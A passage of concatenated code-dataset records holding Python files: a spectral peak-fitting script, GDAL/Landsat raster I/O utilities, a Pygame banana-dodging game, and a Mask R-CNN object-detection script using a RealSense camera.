want the gaussian chi squared\r\n #errs= numpy.sqrt(numpy.diag(pcov)) #pcov is a diagnoal matrix, to get uncertainties we take te sum of diagonal. Get a list of uncertainties with same syntax as initialguesses \r\n #gaussredchi2 = Chi2reduced(yData,gaussianFit, errorBars, NumberofPerameters )\r\n \r\n \r\n #subtracting the data\r\n gaussianSubtractedData=SubtractGaussian(yData,gaussianFit)\r\n subtractedData=SubtractFWHM(xData,gaussianSubtractedData,popt[1],yMaxInfo[1])\r\n \r\n #plotting for visual understanding\r\n LogPlot(xData,yData,'k-','Original Data',False)\r\n LogPlot(xData,gaussianFit,'b-','Gaussian Fit',False)\r\n LogPlot(xData,subtractedData,'r-','Gaussian subtracted',True)\r\n \r\n #seperate the subtracted data into the left and right sides. This also removes negative counts\r\n leftTailxData=xData[:yMaxInfo[1]]\r\n leftTailyData= RemoveNegatives(subtractedData[:yMaxInfo[1]])\r\n rightTailxData=xData[yMaxInfo[1]:]\r\n rightTailyData=RemoveNegatives(subtractedData[yMaxInfo[1]:])\r\n \r\n #find number of counts in tails\r\n countsInLeftTail=round(sum(leftTailyData))\r\n countsInRightTail=round(sum(rightTailyData))\r\n \r\n #get integral of remaining counts in the left and right sides\r\n leftTailIntegral=ReimannSum(leftTailxData,leftTailyData)\r\n rightTailIntegral=ReimannSum(rightTailxData,rightTailyData)\r\n percentageofLeftTail=leftTailIntegral/integralOfData\r\n percentageofRightTail=rightTailIntegral/integralOfData\r\n \r\n \r\n #print statements\r\n print('\\ntotal integral: %s'% str(integralOfData))\r\n print('counts in original peak: %s'% str(countsInData))\r\n print('----------------------')\r\n print('counts in left tail: %s'% str(countsInLeftTail))\r\n print('left tail integral: %s'% str(leftTailIntegral))\r\n print('left tail percentage: %s'% str(percentageofLeftTail))\r\n print('----------------------')\r\n print('counts in right tail: %s'% str(countsInRightTail))\r\n print('right tail integral: %s'% str(rightTailIntegral))\r\n print('right tail percentage: %s'% str(percentageofRightTail))\r\n print('--------------------------------------------------------------')\r\n \r\n \r\n #append values to global lists for plotting\r\n leftSidePercentages.append(percentageofLeftTail*100)\r\n rightSidePercentages.append(percentageofRightTail*100)\r\n totalPercentage.append((percentageofLeftTail+percentageofRightTail)*100)\r\n xAxis.append(xVariable)\r\n \r\n \r\n #graphing the functions in ascending order of voltage differences\r\n leftSide=SortLists(leftSidePercentages,xAxis)\r\n rightSide=SortLists(rightSidePercentages,xAxis)\r\n total=SortLists(totalPercentage,xAxis)\r\n plt.plot(leftSide[1],leftSide[0],'bo--',label='Left Tail')\r\n plt.plot(rightSide[1], rightSide[0],'ko--',label='Right Tail')\r\n plt.plot(total[1], total[0],'go--',label='Total')\r\n \r\n for idx,xval in enumerate(xAxis):# add data lables. If you want to move them around verticly\r\n plt.text(xval,2,resolvingPowers[idx]) # change '2', that is the y coordinate it is displayed on\r\n \r\n plt.xlabel('Trap Symmetry: T_A2_close - T_A1_close (V)')\r\n plt.ylabel('Percentage of total area (%)')\r\n plt.legend()\r\n plt.show() \r\n \r\n \r\nMain()\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"CountsInTails_Vs_InjectionTrapVoltage.py","file_name":"CountsInTails_Vs_InjectionTrapVoltage.py","file_ext":"py","file_size_in_byte":17056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"194544559","text":"import os\nimport csv\nimport datetime\n\nimport numpy as np\nfrom osgeo import gdal\nfrom osgeo import ogr\nfrom osgeo import osr\n\nfrom dromot.utilities import conversion\nfrom dromot.features import feature\n\ndef read_landsat_dir(filedirectory, bands):\n \"\"\"\n bands must be named: blue, green, red, nir, swir1, swir2, etc...\n \"\"\"\n l5_band_map = {\"blue\":\"B1\", \"green\":\"B2\", \"red\":\"B3\", \"nir\":\"B4\", \"swir1\":\"B5\", \"thermal\":\"B6\", \"swir2\":\"B7\"}\n l7_band_map = l5_band_map\n l7_band_map[\"panchromatic\"] = \"B8\"\n l8_band_map = {\"ub\":\"B1\", \"blue\":\"B2\", \"green\":\"B3\", \"red\":\"B4\", \"nir\":\"B5\", \"swir1\":\"B6\", \"swir2\":\"B7\", \"panchromatic\":\"B8\", \"cirrus\":\"B9\", \"tirs1\":\"B10\", \"tirs2\":\"B11\"}\n filelist = os.listdir(filedirectory)\n metadata_file = open(filedirectory + \"/\" + filedirectory.split('/')[-1] + \"_MTL.txt\", \"r\")\n spacecraft = filedirectory.split('/')[-1][:4]\n date_list = None\n time_list = None\n proj = None\n line = metadata_file.readline()\n while line != \"\":\n line = line.strip().split(\" \")\n if line[0] == \"DATE_ACQUIRED\":\n date_list = line[-1].split(\"-\")\n if line[0] == \"SCENE_CENTER_TIME\":\n time_list = line[-1].split(\":\")\n if date_list is not None and time_list is not None:\n acq_date = datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2]), int(time_list[0][1:]), int(time_list[1]), int(float(time_list[2][:-2]))) \n line = metadata_file.readline()\n # now read each band to a raster\n st_raster = None\n data_index = 0\n z_info = {}\n for b in bands:\n z_info[b] = data_index\n data_index += 1\n if spacecraft == \"LT05\":\n infile = filedirectory + \"/\" + filedirectory.split(\"/\")[-1] + \"_\" + l5_band_map[b] + \".tif\"\n elif spacecraft == \"LE07\":\n infile = filedirectory + \"/\" + filedirectory.split(\"/\")[-1] + \"_\" + l7_band_map[b] + \".tif\"\n elif spacecraft == \"LC08\":\n infile = filedirectory + \"/\" + filedirectory.split(\"/\")[-1] + \"_\" + l8_band_map[b] + \".tif\"\n else:\n print(\"error: not a valid landsat sensor\")\n return\n ras = read_geotiff(infile, {1: b}) # doesn't return a valid date because dates are not part of geotiff metadata.\n ras.set_date(acq_date)\n if st_raster is None: # for the first raster, just initialize STFeature\n st_raster = ras\n else: # now append the new raster to the already built STFeature\n st_raster.append_feature(ras)\n st_raster.set_z_info(z_info)\n return st_raster\n\ndef read_geotiff(filename, bandmap):\n \"\"\"\n use this for reading a single geotiff that contains multiple bands\n a bandmap is a dictionary that maps band numbers to band names.\n e.g. {blue: 1, green: 2, red: 3, nir: 4}\n \n return:\n --------\n ras: STFeature.Raster \n a Raster containing the bands specified by the bandmap\n \"\"\"\n ds = gdal.Open(filename) # Open gdal dataset\n ras_proj = ds.GetProjectionRef() # returns SRS in WKT (its a string)\n if ds is None:\n print(\"error: can't open dataset\")\n return\n ncols = ds.RasterXSize\n nrows = ds.RasterYSize\n transform = ds.GetGeoTransform()\n cell_width = transform[1]\n cell_height = transform[5]\n x = transform[0]\n y = transform[3]\n # a check to ensure that cell_wdiths and cell_heights are consistent\n if(abs(transform[1])!= abs(transform[5])): # pixelwidth=1, pixelheight=5\n print(\"info: cell width and cell height are different\")\n data_array = None\n out_z_info = {} # a list to store names of spectral bands, levels, heights, etc. (names corresponding to z dimension)\n data_index = 0\n for b in bandmap:\n # By default get the first band\n band = ds.GetRasterBand(b)\n out_z_info[bandmap[b]] = data_index\n if band is None:\n print(\"error: can't open band\")\n return\n nodata_value = band.GetNoDataValue()\n if nodata_value is None:\n nodata_value = -9999\n if data_array is None:\n data_array = np.array([band.ReadAsArray(0, 0, ncols,nrows)]) #adding an extra dimension here\n else:\n data_array = np.append(data_array, np.array([band.ReadAsArray(0, 0, ncols,nrows)]), axis=0)\n data_array = np.where(data_array == nodata_value, np.nan, data_array) # change missing values to np.nan\n band = None\n data_index += 1\n ras = feature.Raster(data_array.astype(float),\n out_z_info,\n datetime.datetime(1111,11,11),\n ras_proj,\n \"standard\",\n None,\n x,\n y,\n cell_width,\n cell_height)\n del transform\n del data_array\n del ds\n return ras\n\n\n# should also include datetimes as a parameter to write specific dates to dthe file.\ndef write_geotiff(input_raster, outputfilename, z_values, out_data_type=gdal.GDT_Float32):\n \"\"\"\n writes the input_feature at the specified z_values to disk\n \n parameters:\n -----------\n input_raster: STFeature.raster or STFeatureStack.RasterStack\n outputfilename: string\n output location for the geotiff file\n z_values: list\n a list of z values to write to the geotiff\n\n returns:\n ---------\n None\n \"\"\"\n # credits to the HPGIS PCML library\n driver = gdal.GetDriverByName('GTiff')\n out = driver.Create(outputfilename, input_raster.ncols, input_raster.nrows, len(z_values), out_data_type)\n if out is None:\n print(\"error: cannot write to \" + outputfilename)\n return\n out.SetGeoTransform((input_raster.x, input_raster.cell_width, 0, input_raster.y, 0, input_raster.cell_height))\n out.SetProjection(input_raster.projection)\n bandnumber = 1\n for z in z_values:\n outband = out.GetRasterBand(bandnumber)\n outband.WriteArray(input_raster.data[input_raster.get_index_at_z(z)])\n outband.FlushCache()\n bandnumber+=1\n out = None\n\n\ndef csv_to_features(filename):\n indata = np.loadtxt(filename, dtype=str, delimiter=\",\")\n datelist = []\n out_rainfall = indata[1:,2].astype(float).reshape(-1,1,1,1)\n out_temp = indata[1:,3].astype(float).reshape(-1,1,1,1)\n out_rel_hum = indata[1:,4].astype(float).reshape(-1,1,1,1)\n out_wind = indata[1:,5].astype(float).reshape(-1,1,1,1)\n for row in indata[1:]:\n datelist.append(datetime.datetime(year=int(row[1][:4]),month=int(row[1][4:6]),day=int(row[1][6:]))) # append the datetime ob\n # create the featureStacks\n rain = feature.RasterStack()\n rain.create_sc_stack(out_rainfall, datelist, None, \"standard\", 0, 0, 1, -1)\n temp = feature.RasterStack()\n temp.create_sc_stack(out_temp, datelist, None, \"standard\", 0, 0, 1, -1)\n relhum = feature.RasterStack()\n relhum.create_sc_stack(out_rel_hum, datelist, None, \"standard\", 0, 0, 1, -1)\n wind = feature.RasterStack()\n wind.create_sc_stack(out_wind, datelist, None, \"standard\", 0, 0, 1, -1)\n conversion.mpers_to_kmperh(wind)\n return rain, temp, relhum, wind\n\ndef write_kbdi(inputfilename, outputfilename, KBDIobject):\n kbdi = KBDIobject.data.flatten()\n with open(inputfilename, \"r\") as inputcsv:\n with open(outputfilename, \"w\", newline=\"\") as outputcsv:\n reader = csv.reader(inputcsv, delimiter=\",\")\n writer = csv.writer(outputcsv, delimiter=\",\")\n index = 0\n firstRow = True\n for row in reader:\n if firstRow:\n firstRow = False\n row.extend([\"KBDI\"])\n else:\n row.extend([kbdi[index]])\n index+=1\n writer.writerow(row)\n\ndef write_output(inputfilename, outputfilename, KBDIobject, FFDIobject, DFobject):\n kbdi = KBDIobject.data.flatten()\n ffdi = FFDIobject.data.flatten()\n df = DFobject.data.flatten()\n with open(inputfilename, \"r\") as inputcsv:\n with open(outputfilename, \"w\", newline=\"\") as outputcsv:\n reader = csv.reader(inputcsv, delimiter=\",\")\n writer = csv.writer(outputcsv, delimiter=\",\")\n index = 0\n firstRow = True\n for row in reader:\n if firstRow:\n firstRow = False\n row.extend([\"KBDI\", \"DF\", \"FFDI\"])\n else:\n row.extend([kbdi[index],df[index],ffdi[index]])\n index+=1\n writer.writerow(row)\n ","sub_path":"dromot/utilities/input_output.py","file_name":"input_output.py","file_ext":"py","file_size_in_byte":8631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139901879","text":"#包括主Game类和一些游戏状态类\nimport os, sys, pygame\n##导入一些常用的函数和常量\nfrom pygame.locals import *\n#导入对应的模块\nfrom Squish import objects\nfrom Squish import config\n\nclass State:\n #表示何时程序退出\n def handle(self, event):\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n sys.exit()\n\n def firstDisplay(self, screen):\n #使用背景色填充屏幕\n screen.fill(config.Background_color)\n #pygame.display.update()是将数据画到前面显示,每次看到的都是在原基础上改变的过程\n #而pygame.display.flip()是交替显示的意思,每次看到的都是完整的图案。\n pygame.display.flip()\n\n def display(self):\n #用于在显示过一次状态之后再次显示,默认的行为是什么都不做\n pass\n\nclass Level(State):\n #游戏等级,用于计算已经落下了多少的秤砣,移动子图形以及其他的和游戏逻辑相关的任务\n def __init__(self, number = 1):\n self.number = number\n #本关还要落下多少秤砣\n self.remaining = config.Weight_per_level\n #将速度设置为config里面的速度\n speed = config.Drop_speed\n #为每个大于一的等级都增加一个Speed_increase对应的值\n speed += (self.number - 1) * config.Speed_increase\n #创建秤砣和香蕉\n self.weight = objects.Weight(speed)\n self.banana = objects.Banana()\n both = self.weight, self.banana\n self.sprites = pygame.sprite.RenderUpdates(both)\n\n def update(self, game):\n #更新游戏状态\n self.sprites.update()\n #香蕉和秤砣接触的情况\n if self.banana.touches(self.weight):\n game.nextState = GameOver()\n #秤砣落下之后的情况\n elif self.weight.landed:\n #重置位置\n self.weight.reset()\n #剩下的秤砣数减一\n self.remaining -= 1\n #当所有秤砣已用完时,过关\n if self.remaining == 0:\n game.nextState = LevelCleared(self.number)\n\n def display(self, screen):\n #用背景色填充屏幕\n screen.fill(config.Background_color)\n #对self.sprites.draw提供的需要更新的矩形列表进行更新\n updates = self.sprites.draw(screen)\n pygame.display.update(updates)\n\n#暂停游戏的状态,只要键盘上的按键被按下或者鼠标被点击都可以结束这个状态\n#下面这个类是后面几个类的基类\nclass Paused(State):\n #用一个bool变量来表示用户是否结束暂停\n finished = 0\n #如果需要图片的话,将这个变量设置为文件名\n image = None\n #引号里面可以设置成提示性文本(看个人喜好)\n text = 'Pause'\n\n def handle(self, event):\n #通过对State进行委托(运用State的方法)以及对按键和鼠标点击作为反应来处理事件\n #如果键盘按键被按下时或者鼠标被点击时,将bool变量self.finished设定为真\n State.handle(self, event)\n if event.type in [MOUSEBUTTONDOWN, KEYDOWN]:\n self.finished = 1\n\n def update(self, game):\n #如果self.finished为真,则告诉游戏切换到下一个由self.nextState()表示的状态\n if self.finished:\n game.nextState = self.nextState()\n\n def firstDisplay(self, screen):\n #背景色填充\n screen.fill(config.Background_color)\n #设置字体以及字体的大小\n font = pygame.font.Font(None, config.font_size)\n #文本\n lines = self.text.strip().splitlines()\n #文本的高\n height = len(lines) * font.get_linesize()\n center, top = screen.get_rect().center\n top -= height // 2\n if self.image:\n image = pygame.image.load(self.image).convert()\n r = image.get_rect()\n top += r.height // 2\n r.midbottom = center.top - 20\n screen.blit(image, r)\n #bool型变量,用来表示文本中的字体是否抗锯齿\n antialias = 1\n #黑色的元组表示,里面的数字范围均是0~255\n black = (0, 0, 0)\n for line in lines:\n #字体render后面的参数一共有4个,分别是文本,是否抗锯齿(bool型的变量),字体的颜色,背景的颜色(可不写,即默认值)\n text = font.render(line.strip(), antialias, black)\n r = text.get_rect()\n r.midtop = center, top\n #将text移动到r处,其中r为text的左上角\n screen.blit(text, r)\n top += font.get_linesize()\n #显示画面\n pygame.display.flip()\n\n#暂停状态(Paused)的子类,显示有关的游戏信息,在Level状态后显示信息\nclass Info(Paused):\n nextState = Level\n text = '''\n In this game you are a banana,\n trying to survive a course in\n self-defense against fruit, where\n the participants will \"defend\" \n themselves against you with a \n 16 ton weight.\n '''\n\n#暂停状态(Paused)的子类,显示图片和欢迎信息的暂停状态,在info状态后显示\nclass StartUp(Paused):\n nextState = Info\n image = config.Splash_image\n text = '''\n Welcome to Squish,\n the game of Fruit Self-Denfense.\n '''\n\n#暂停状态(Paused)的子类,提示用户等级提升的状态,在next level后显示\nclass LevelCleared(Paused):\n def __init__(self, number):\n self.number = number\n self.text = '''\n Level %i cleared\n Click to start next level\n '''%self.number\n\n def nextState(self):\n return Level(self.number + 1)\n\n#暂停状态(Paused)的子类,提示用户输掉游戏的状态,在first level后显示\nclass GameOver(Paused):\n nextState = Level\n text = '''\n Game Over,\n click to Restart, Esc to Quit.\n '''\n\n#负责主事件循环的游戏对象,任务包括在不同的状态间切换\nclass Game:\n def __init__(self, *args):\n #获取图像和游戏放置的目录\n path = os.path.abspath(args[0])\n dir = os.path.split(path[0])\n #移动上面的目录(这样图片便可以在稍后打开)\n os.chdir(dir)\n #无状态方式启动\n self.state = None\n #在第一个时间循环迭代中移动到StartUp\n self.nextState = StartUp()\n\n #这个方法旨在动态设置变量,进行一些重要的初始化工作,并且进入主事件循环\n def run(self):\n #初始化pygame\n pygame.init()\n #设置一个bool型的变量,用其来记住是否为全屏模式\n flag = 0\n if config.full_screen:\n flag = FULLSCREEN\n screen_size = config.Screen_size\n #访问显示器,设置屏幕的大小,模式\n screen = pygame.display.set_mode(screen_size, flag)\n #设置屏幕的名称\n pygame.display.set_caption('Fruit Self Denfense')\n #隐藏或者展示鼠标指针\n pygame.mouse.set_visible(False)\n #主循环\n while True:\n if self.state != self.nextState:\n self.state = self.nextState\n self.state.firstDisplay(screen)\n for event in pygame.event.get():\n self.state.handle(event)\n self.state.update(self)\n self.state.display(screen)\n\nif __name__ == \"__main__\":\n game = Game(*sys.argv)\n game.run()\n\n","sub_path":"squish.py","file_name":"squish.py","file_ext":"py","file_size_in_byte":7556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"217298588","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport sys\r\nimport math\r\nimport numpy as np\r\nimport cv2 \r\nimport time\r\nimport pyrealsense2 as rs\r\nfrom mrcnn.config import Config\r\nfrom datetime import datetime\r\nfrom skimage.measure import find_contours\r\nfrom mrcnn import utils\r\nimport mrcnn.model as modellib\r\nfrom mrcnn import visualize\r\n\r\nfrom corner_detect import corner_points\r\nfrom corner_detect import mask2contour\r\nfrom corner_config import Inference1Config\r\nfrom disturbance_delete import find_plane \r\nfrom disturbance_delete import is_disturbance\r\nfrom mrcnn import visualize2\r\n\r\n \r\nclass ShapesConfig(Config):\r\n \"\"\"Configuration for training on the toy shapes dataset.\r\n Derives from the base Config class and overrides values specific\r\n to the toy shapes dataset.\r\n \"\"\"\r\n # Give the configuration a recognizable name\r\n NAME = \"shapes\"\r\n \r\n # Train on 1 GPU and 8 images per GPU. We can put multiple images on each\r\n # GPU because the images are small. Batch size is 8 (GPUs * images/GPU).\r\n GPU_COUNT = 1\r\n IMAGES_PER_GPU = 1\r\n \r\n # Number of classes (including background)\r\n NUM_CLASSES = 1 + 29\r\n # Use small images for faster training. Set the limits of the small side\r\n # the large side, and that determines the image shape.\r\n IMAGE_MIN_DIM = 480\r\n IMAGE_MAX_DIM = 640\r\n \r\n # Use smaller anchors because our image and objects are small\r\n RPN_ANCHOR_SCALES = (8 * 6, 16 * 6, 32 * 6, 64 * 6, 128 * 6) # anchor side in pixels\r\n \r\n # Reduce training ROIs per image because the images are small and have\r\n # few objects. Aim to allow ROI sampling to pick 33% positive ROIs.\r\n TRAIN_ROIS_PER_IMAGE =150\r\n \r\n # Use a small epoch since the data is simple\r\n STEPS_PER_EPOCH = 300\r\n \r\n # use small validation steps since the epoch is small\r\n VALIDATION_STEPS = 150\r\n \r\n#class InferenceConfig(coco.CocoConfig):\r\nclass InferenceConfig(ShapesConfig):\r\n # Set batch size to 1 since we'll be running inference on\r\n # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU\r\n GPU_COUNT = 1\r\n IMAGES_PER_GPU = 1\r\n# Root directory of the project\r\nROOT_DIR = os.getcwd()\r\n \r\n# Import Mask RCNN\r\nsys.path.append(ROOT_DIR) # To find local version of the library \r\n# Directory to save logs and trained model\r\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs\")\r\n\r\nconfig_detect = InferenceConfig()\r\nconfig_corner = Inference1Config()\r\n# Create model object in inference mode.\r\nmodel_detect= modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config_detect)\r\nmodel_corner= modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config_corner)\r\n# Load weights trained on MS-COCO\r\nmodel_detect.load_weights('./logs/detect_model/mask_rcnn_shapes_0030.h5', by_name=True)\r\nmodel_corner.load_weights('./logs/corner_model/mask_rcnn_shapes_0027.h5', by_name=True)\r\ndef coordinate_transform(x,y,id,M):\r\n a=np.array([[[x,y]]],dtype='float32')\r\n #a=np.array([a])\r\n true_coordinate=cv2.perspectiveTransform(a,M)\r\n \r\n radius={1:0,\r\n 2:4.3,\r\n 3:0,\r\n 4:2.0,\r\n 5:0,\r\n 6:3.3,\r\n 7:3.2,\r\n 8:3.3,\r\n 9:0,\r\n 10:2.6,\r\n 11:0,\r\n 12:3.4,\r\n 13:0,\r\n 14:3.3,\r\n 15:2.6,\r\n 16:3.1,\r\n 17:3.3,\r\n 18:3.3,\r\n 19:3.5,\r\n 20:4.6,\r\n 21:2.7,\r\n 22:3.5,\r\n 23:3,\r\n 24:3,\r\n 25:2.9,\r\n 26:11.5,\r\n 27:3,\r\n 28:2,\r\n 29:2}\r\n return int(true_coordinate[0][0][0]),int(true_coordinate[0][0][1]-radius[id])\r\n\r\ndef detectandmeasure(model_detect,model_corner,pipeline,pipe_profile):\r\n #开始检测并开始计时\r\n start=datetime.now()\r\n detect_class_names = ['BG', 'toilet_soap', 'liquid_soap','toothpaste', 'toilet_water','duck', 'porridge','water','old_godmother','tang','gum','soda','copico','melon_seeds','red_bull','AD_milk','juice',\r\n 'Wanglaoji','Jiaduobao', 'green_tea', 'snow_pear', 'coconut', 'black_tea','coca_cola', 'sprite', 'fenta', 'cookie', 'noodles','tea_pi','fries']\r\n detect_class_names1=['BG','ZA001','ZA002','ZA003','ZA004','ZA005','ZB001','ZC014','ZB002','ZB004','ZB005','ZB007','ZB008','ZB010','ZC004','ZC005','ZC006',\r\n 'ZC007','ZC008','ZC010','ZC011','ZC013','ZC009','ZC002','ZC001','ZC003','ZB003','ZB006','ZC012','ZB009']\r\n # 对齐变量初始化\r\n align_to_color=rs.align(rs.stream.color)\r\n # 提前读几帧,避免开始电压不稳,图片不稳定\r\n for i in range(5):\r\n frames = pipeline.wait_for_frames()\r\n color_frame = frames.get_color_frame()\r\n\r\n # 等待读入流\r\n frames = pipeline.wait_for_frames()\r\n # 深度向彩色对齐\r\n frames = align_to_color.process(frames)\r\n depth_frame = frames.get_depth_frame()\r\n color_frame = frames.get_color_frame()\r\n # Intrinsics & Extrinsics 摄像头内参和外参\r\n depth_intrin = depth_frame.profile.as_video_stream_profile().intrinsics\r\n color_intrin = color_frame.profile.as_video_stream_profile().intrinsics\r\n depth_to_color_extrin = depth_frame.profile.get_extrinsics_to(color_frame.profile)\r\n # Depth scale - units of the values inside a depth frame, i.e how to convert the value to units of 1 meter\r\n # 深度传感器初始化\r\n depth_sensor = pipe_profile.get_device().first_depth_sensor()\r\n # 深度传感器参数调整(目前只会motion_range)\r\n depth_sensor.set_option(rs.option.motion_range,11)\r\n depth_sensor.set_option(rs.option.accuracy,1)\r\n depth_sensor.set_option(rs.option.filter_option,5)\r\n depth_sensor.set_option(rs.option.confidence_threshold,2)\r\n\r\n depth_sensor.set_option(rs.option.laser_power,16)\r\n # 深度比例\r\n depth_scale = depth_sensor.get_depth_scale()\r\n #设置count,用来判断成功了几次完整的检测\r\n count=0\r\n while True:\r\n #循环中加载图片\r\n frames = pipeline.wait_for_frames()\r\n frames = align_to_color.process(frames)\r\n depth_frame = frames.get_depth_frame()\r\n color_frame = frames.get_color_frame()\r\n if not depth_frame or not color_frame:\r\n continue\r\n frame = np.asanyarray(color_frame.get_data())\r\n depth_image = np.asanyarray(depth_frame.get_data())\r\n color_image = np.asanyarray(color_frame.get_data())\r\n image=cv2.cvtColor(color_image,cv2.COLOR_BGR2RGB)\r\n frame1=image.copy()\r\n\r\n #显示视频流辅助调整位置\r\n #cv2.imshow('camere',color_image)\r\n #cv2.waitKey(10)\r\n\r\n #检测桌角\r\n point_set=corner_points(frame1,model_corner)\r\n #打印点的信息\r\n for key in point_set:\r\n print(key,rs.rs2_deproject_pixel_to_point(depth_intrin, [int(point_set[key][0]),int(point_set[key][1])], depth_frame.get_distance(int(point_set[key][0]),int(point_set[key][1]))))\r\n #画出找到的桌角\r\n if point_set:\r\n for key in point_set:\r\n cv2.circle(color_image,(int(point_set[key][0]),int(point_set[key][1])),2,(0,255,0),2) \r\n #cv2.imshow('corner_point',color_image)\r\n #cv2.waitKey(10)\r\n if len(point_set)!=4:\r\n point_set['corner1']=[100,100]\r\n point_set['corner2']=[100,380]\r\n point_set['corner3']=[500,380]\r\n point_set['corner4']=[500,100]\r\n ##当四个点都找到时进行透视变换##################\r\n if len(point_set)==4:\r\n dst=np.array([[0, 0], [549, 0],[0, 549],[549, 549] ], dtype=np.float32)\r\n src = np.array([point_set['corner1'],point_set['corner4'],point_set['corner2'],point_set['corner3']], dtype=np.float32)\r\n m = cv2.getPerspectiveTransform(src, dst)\r\n # 使用m矩阵变换,结果为图像大小,使用白色填充\r\n res = cv2.warpPerspective(\r\n color_image,\r\n m,\r\n (549, 549),\r\n borderValue=(255, 255, 255, 255)\r\n )\r\n cv2.imshow(\"perspective_transform\",res)\r\n cv2.waitKey(10)\r\n #透视变换结束后开始进行物体检测\r\n detect_results = model_detect.detect([image], verbose=1)\r\n r_detect = detect_results[0]\r\n coordinate=[]\r\n #寻找桌面所在平面的方程,为后面排除干扰项做准备\r\n params=find_plane(point_set,depth_frame,r_detect['rois'],depth_intrin,depth_to_color_extrin)\r\n for i in range(len(r_detect['class_ids'])):\r\n x=int((r_detect['rois'][i][1]+r_detect['rois'][i][3])/2)\r\n contour=mask2contour(r_detect['masks'][:,:,i])\r\n y_max=0\r\n x_max=0\r\n angle=0\r\n #如果是干扰项,进行下一项判断,不是则输出并添加到坐标中\r\n if is_disturbance(params,contour,depth_frame,depth_intrin,depth_to_color_extrin):\r\n print('%s is disturbance'%(detect_class_names[r_detect['class_ids'][i]]))\r\n continue\r\n if detect_class_names[r_detect['class_ids'][i]] in ['toothpaste','toilet_soap','snow_pear','tea_pi','tang']:\r\n #roi_mat=np.ones((480,640,3),dtype=np.uint8)*255\r\n frame_copy=np.array(frame)\r\n roi_mat=frame_copy[r_detect['rois'][i][0]:r_detect['rois'][i][2],r_detect['rois'][i][1]:r_detect['rois'][i][3],:].copy()\r\n #print('1',frame_copy[r_detect['rois'][i][0]:r_detect['rois'][i][2],r_detect['rois'][i][1]:r_detect['rois'][i][3],:])\r\n #print('2',roi_mat)\r\n edges = cv2.Canny(cv2.cvtColor(roi_mat,cv2.COLOR_BGR2GRAY),100, 255, apertureSize=3)\r\n LINES=cv2.HoughLinesP(edges, 1.0, np.pi / 180, 50,1, 30,40)\r\n #print(\"线段数\",len(LINES))\r\n line_lenth=0\r\n angle_x1=0\r\n angle_x2=0\r\n angle_y1=0\r\n angle_y2=0\r\n if LINES is None:\r\n pass\r\n else:\r\n for line in LINES:\r\n for x1,y1,x2,y2 in line:\r\n if (x1-x2)*(x1-x2)+(y1-y2)*(y1-y2)>line_lenth:\r\n line_lenth=(x1-x2)*(x1-x2)+(y1-y2)*(y1-y2)\r\n angle_x1=x1\r\n angle_x2=x2\r\n angle_y1=y1\r\n angle_y2=y2\r\n cv2.line(roi_mat,(x1, y1), (x2, y2), (0, 255,0 ), 3)\r\n cv2.imshow('roi',roi_mat)\r\n cv2.waitKey(10)\r\n mat_tmp1=np.array([[[angle_x1,angle_y1]]],dtype='float32')\r\n \r\n true_coordinate1=cv2.perspectiveTransform(mat_tmp1,m)\r\n angle_x1_plane=true_coordinate1[0][0][0]\r\n angle_y1_plane=true_coordinate1[0][0][1]\r\n mat_tmp1=np.array([[[angle_x2,angle_y2]]],dtype='float32')\r\n true_coordinate1=cv2.perspectiveTransform(mat_tmp1,m)\r\n angle_x2_plane=true_coordinate1[0][0][0]\r\n angle_y2_plane=true_coordinate1[0][0][1]\r\n angle=math.atan2(angle_y2_plane-angle_y1_plane,angle_x2_plane-angle_x1_plane)\r\n angle=math.degrees(angle)-3+180\r\n if angle>180:\r\n angle=angle-180\r\n \r\n for each in contour:\r\n if each[0]>y_max:\r\n y_max=each[0]\r\n y=y_max\r\n x1,y1=coordinate_transform(x,y,r_detect['class_ids'][i],m)\r\n print(detect_class_names[r_detect['class_ids'][i]])\r\n print((x1/10,y1/10), angle)\r\n coordinate.append([detect_class_names[r_detect['class_ids'][i]],r_detect['scores'][i],r_detect['rois'][i],[x1,y1,angle]])\r\n #cv2.imshow('result',color_image) \r\n #cv2.waitKey(1000) \r\n #展示最原始的检测信息(可注释)\r\n #visualize.display_instances(image, r_detect['rois'], r_detect['masks'], r_detect['class_ids'],detect_class_names, r_detect['scores'])\r\n count+=1\r\n if count==1:\r\n end=datetime.now()\r\n print('total time:',(end-start).seconds)\r\n image=visualize2.video_display1(color_image,coordinate)\r\n return image\r\n break\r\n \r\n \r\n \r\n ","sub_path":"desk/compitition.py","file_name":"compitition.py","file_ext":"py","file_size_in_byte":12676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"121101950","text":"import csv\nimport copy\n\nwith open(\"y_raw.csv\", 'r') as infile, open(\"Xmat_lang.csv\") as infile1, open(\"desc.csv\") as infile2, open(\"XYmat_lang_desc.csv\", 'w') as outfile:\n\ty_raw = csv.DictReader(infile)\n\tXmat = csv.DictReader(infile1)\n\tdesc_mat = csv.DictReader(infile2)\n\tfieldnames = next(Xmat)\n\txrow = copy.deepcopy(fieldnames)\n\t#print(fieldnames)\n\tfieldnames.pop(\"name\")\n\theader = [\"name\", \"reviews\", \"desc_snippet\"]\n\tfor i in fieldnames:\n\t\theader.append(i)\n\tw = csv.DictWriter(outfile, fieldnames = header)\n\tw.writeheader()\n\ti = 1\n\tj = 1\n\tdesc_row = next(desc_mat)\n\n\tfor row in y_raw:\n\t\t\n\t\tif row[\"reviews\"] != \"NaN\" and len(desc_row[\"desc_snippet\"]) > 0 and desc_row[\"desc_snippet\"] != \"NaN\":\n\t\t\tif i != 1:\n\t\t\t\txrow = next(Xmat)\n\t\t\t\tj += 1\n\t\t\t\twhile(xrow[\"name\"] != desc_row[\"name\"]):\n\t\t\t\t\txrow = next(Xmat)\n\t\t\t\t\tj += 